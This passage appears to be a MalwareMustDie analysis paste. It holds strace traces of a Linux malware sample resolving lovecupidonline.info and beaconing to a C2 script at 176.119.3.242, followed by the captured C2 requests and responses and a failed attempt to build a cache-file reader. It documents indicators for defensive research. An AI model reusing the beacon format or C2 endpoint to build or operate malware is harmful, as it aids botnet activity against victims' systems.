  611. [pid 18153] read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
  612. [pid 18153] read(4, "", 4096)           = 0
  613. [pid 18153] close(4)                    = 0
  614. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  615. [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
  616. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  617. [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
  618. [pid 18153] close(4)                    = 0
  619. [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  620. [pid 18153] open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
  621. [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200!\0\0\0\0\0\0"..., 832) = 832
  622. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=47616, ...}) = 0
  623. [pid 18153] mmap(NULL, 2143624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d4acd000
  624. [pid 18153] mprotect(0x7f57d4ad8000, 2093056, PROT_NONE) = 0
  625. [pid 18153] mmap(0x7f57d4cd7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0xa000) = 0x7f57d4cd7000
  626. [pid 18153] close(4)                    = 0
  627. [pid 18153] mprotect(0x7f57d4cd7000, 4096, PROT_READ) = 0
  628. [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
  629. [pid 18153] open("/etc/host.conf", O_RDONLY) = 4
  630. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=9, ...}) = 0
  631. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  632. [pid 18153] read(4, "multi on\n", 4096) = 9
  633. [pid 18153] read(4, "", 4096)           = 0
  634. [pid 18153] close(4)                    = 0
  635. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  636. [pid 18153] futex(0x7f57d90a0324, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  637. [pid 18153] open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4
  638. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=495, ...}) = 0
  639. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  640. [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 495
  641. [pid 18153] read(4, "", 4096)           = 0
  642. [pid 18153] close(4)                    = 0
  643. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  644. [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
  645. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  646. [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
  647. [pid 18153] close(4)                    = 0
  648. [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  649. [pid 18153] open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
  650. [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\20\0\0\0\0\0\0"..., 832) = 832
  651. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=22928, ...}) = 0
  652. [pid 18153] mmap(NULL, 2117888, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d48c7000
  653. [pid 18153] mprotect(0x7f57d48cc000, 2093056, PROT_NONE) = 0
  654. [pid 18153] mmap(0x7f57d4acb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x4000) = 0x7f57d4acb000
  655. [pid 18153] close(4)                    = 0
  656. [pid 18153] mprotect(0x7f57d4acb000, 4096, PROT_READ) = 0
  657. [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
  658. [pid 18153] stat("/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
  659. [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
  660. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
  661. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  662. [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
  663. [pid 18153] read(4, "", 4096)           = 0
  664. [pid 18153] close(4)                    = 0
  665. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  666. [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
  667. [pid 18153] socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
  668. [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
  669. [pid 18153] poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
  670. [pid 18153] sendto(4, "\313:\1\0\0\1\0\0\0\0\0\0\17lovecupidonline\4inf"..., 38, MSG_NOSIGNAL, NULL, 0) = 38
  671. [pid 18153] poll([{fd=4, events=POLLIN}], 1, 5000) = 1 ([{fd=4, revents=POLLIN}])
  672. [pid 18153] ioctl(4, FIONREAD, [54])    = 0
  673. [pid 18153] recvfrom(4, "\313:\201\200\0\1\0\1\0\0\0\0\17lovecupidonline\4inf"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 54
  674. [pid 18153] close(4)                    = 0
  675. [pid 18153] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
  676. [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("176.119.3.242")}, 16) = 0
  677. [pid 18153] write(4, "POST /cupids_banner/cupids.php H"..., 196) = 196
  678.  
  679.  
  680. // CALLBACKS GENERATED:
  681.  
  682. // CNC calls -1-
  683.  
  684. POST /cupids_banner/cupids.php HTTP/1.0
  685. Host: lovecupidonline.info
  686. Pragma: 1337
  687. Content-Length: 91
  688.  
  689. R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
  690.  
  691. // response:
  692. HTTP/1.1 200 OK
  693. Date: Tue, 05 Aug 2014 08:30:05 GMT
  694. Server: Apache/2.2.15 (CentOS)
  695. X-Powered-By: PHP/5.5.15
  696. Content-Length: 13
  697. Connection: close
  698. Content-Type: text/html; charset=UTF-8
  699.  
  700. mysql_connect^Y<96><E0>S<E5><EC>^@^@B^@^@^@B^@^@^@^@^Y<DB><F2><BE>)^@&<88>v%<8C>^H^@E<CC>^@4m^Q@^@9^F<AC>
  701. <B0>w^C<F2>N.%E^@P<8A><B8><86>9<DE>^Y<D0>P<EA><BE><80>^Q^@zF<81>^@^@^A^A^H[...]
  702.  
  703.  
  704. // CNC Calls -2-
  705.  
  706. POST /cupids_banner/cupids.php HTTP/1.0
  707. Host: lovecupidonline.info
  708. Pragma: 1337
  709. Content-Length: 91
  710.  
  711. R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
  712.  
  713. //response
  714.  
  715. HTTP/1.1 200 OK
  716. Date: Tue, 05 Aug 2014 08:31:05 GMT
  717. Server: Apache/2.2.15 (CentOS)
  718. X-Powered-By: PHP/5.5.15
  719. Content-Length: 6
  720. Connection: close
  721. Content-Type: text/html; charset=UTF-8
  722.  
  723. R,200
  724.  
  725.  
  726. // CNC Calls -3-
  727.  
  728. POST /cupids_banner/cupids.php HTTP/1.0
  729. Host: lovecupidonline.info
  730. Pragma: 1337
  731. Content-Length: 12
  732.  
  733. P,0,0,0,0,2
  734.  
  735.  
  736. // response:
  737.  
  738. HTTP/1.1 200 OK
  739. Date: Tue, 05 Aug 2014 08:32:06 GMT
  740. Server: Apache/2.2.15 (CentOS)
  741. X-Powered-By: PHP/5.5.15
  742. Content-Length: 2
  743. Connection: close
  744. Content-Type: text/html; charset=UTF-8
  745.  
  746. C
  747.  
  748. // CNC calls -4-
  749.  
  750. POST /cupids_banner/cupids.php HTTP/1.0
  751. Host: lovecupidonline.info
  752. Pragma: 1337
  753. Content-Length: 12
  754.  
  755. P,0,0,0,0,3
  756.  
  757. // response:
  758.  
  759. HTTP/1.1 200 OK
  760. Date: Tue, 05 Aug 2014 08:24:55 GMT
  761. Server: Apache/2.2.15 (CentOS)
  762. X-Powered-By: PHP/5.5.15
  763. Content-Length: 6
  764. Connection: close
  765. Content-Type: text/html; charset=UTF-8
  766.  
  767. R,200
  768.  
  769. // compile the reader for cache reading..
  770. // source1: https://github.com/freeoks/SD0_reader
  771. // source2: http://ultra-embedded.com/fat_filelib
  772.  
  773. // put all in a place:
  774. -rw-r--r-- 1 rik rik 4980 Nov 30  2013 fat_access.h
  775. -rw-r--r-- 1 rik rik  526 Nov 30  2013 fat_cache.h
  776. -rw-r--r-- 1 rik rik 4983 Nov 30  2013 fat_defs.h
  777. -rw-r--r-- 1 rik rik 4698 Nov 30  2013 fat_filelib.h
  778. -rw-r--r-- 1 rik rik  545 Nov 30  2013 fat_format.h
  779. -rw-r--r-- 1 rik rik 4646 Nov 30  2013 fat_list.h
  780. -rw-r--r-- 1 rik rik 3330 Nov 30  2013 fat_misc.h
  781. -rw-r--r-- 1 rik rik 2409 Nov 30  2013 fat_opts.h
  782. -rw-r--r-- 1 rik rik  783 Nov 30  2013 fat_string.h
  783. -rw-r--r-- 1 rik rik  922 Nov 30  2013 fat_table.h
  784. -rw-r--r-- 1 rik rik 1998 Nov 30  2013 fat_types.h
  785. -rw-r--r-- 1 rik rik  599 Nov 30  2013 fat_write.h
  786.  
  787. // edit the makefile..get rid of "/lib/"
  788. // and compile..
  789.  
  790.  $ make
  791. gcc -c -I./lib read_sd0.c -o read_sd0.o
  792. read_sd0.c: In function 'decrypt_blocks':
  793. read_sd0.c:51:9: warning: incompatible implicit declaration of built-in function 'memcpy' [enabled by default]
  794. read_sd0.c: In function 'read_files_from_directory':
  795. read_sd0.c:130:47: warning: incompatible implicit declaration of built-in function 'strlen' [enabled by default]
  796. read_sd0.c:131:17: warning: incompatible implicit declaration of built-in function 'strcpy' [enabled by default]
  797. read_sd0.c:132:17: warning: incompatible implicit declaration of built-in function 'strcat' [enabled by default]
  798. gcc -c -I./lib fat_access.c -o fat_access.o
  799. gcc -c -I./lib fat_cache.c -o fat_cache.o
  800. gcc -c -I./lib fat_filelib.c -o fat_filelib.o
  801. gcc -c -I./lib fat_format.c -o fat_format.o
  802. gcc -c -I./lib fat_misc.c -o fat_misc.o
  803. gcc -c -I./lib fat_string.c -o fat_string.o
  804. gcc -c -I./lib fat_table.c -o fat_table.o
  805. gcc -c -I./lib fat_write.c -o fat_write.o
  806. gcc -s read_sd0.o fat_access.o fat_cache.o fat_filelib.o fat_format.o fat_misc.o fat_string.o fat_table.o fat_write.o -o read_sd0
  807.  
  808. // doesnt work :-(((( no output at all..
  809.  
  810. ./read_sd0  -f .cache -d ./test
  811. execve("./read_sd0", ["./read_sd0", "-f", ".cache", "-d", "./test"], [/* 20 vars */]) = 0
  812. brk(0)                                  = 0x1479000
  813. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  814. mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf716000
  815. access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
  816. open("/etc/ld.so.cache", O_RDONLY)      = 3
  817. fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  818. mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fdfcf708000
  819. close(3)                                = 0
  820. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  821. open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
  822. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  823. fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  824. mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fdfcf16e000
  825. mprotect(0x7fdfcf2f0000, 2093056, PROT_NONE) = 0
  826. mmap(0x7fdfcf4ef000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7fdfcf4ef000
  827. mmap(0x7fdfcf4f4000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf4f4000
  828. close(3)                                = 0
  829. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf707000
  830. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf706000
  831. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf705000
  832. arch_prctl(ARCH_SET_FS, 0x7fdfcf706700) = 0
  833. mprotect(0x7fdfcf4ef000, 16384, PROT_READ) = 0
  834. mprotect(0x7fdfcf718000, 4096, PROT_READ) = 0
  835. munmap(0x7fdfcf708000, 56122)           = 0
  836. open(".cache", O_RDONLY)                = 3
  837. lseek(3, 0, SEEK_END)                   = 12582912
  838. mmap(NULL, 12582912, PROT_READ, MAP_SHARED, 3, 0) = 0x7fdfce56e000
  839. exit_group(0)                           = ?
  840.  
  841.  
  842. ----
  843. #MalwareMustdie | @unixfreaxjp
RAW Paste Data
Top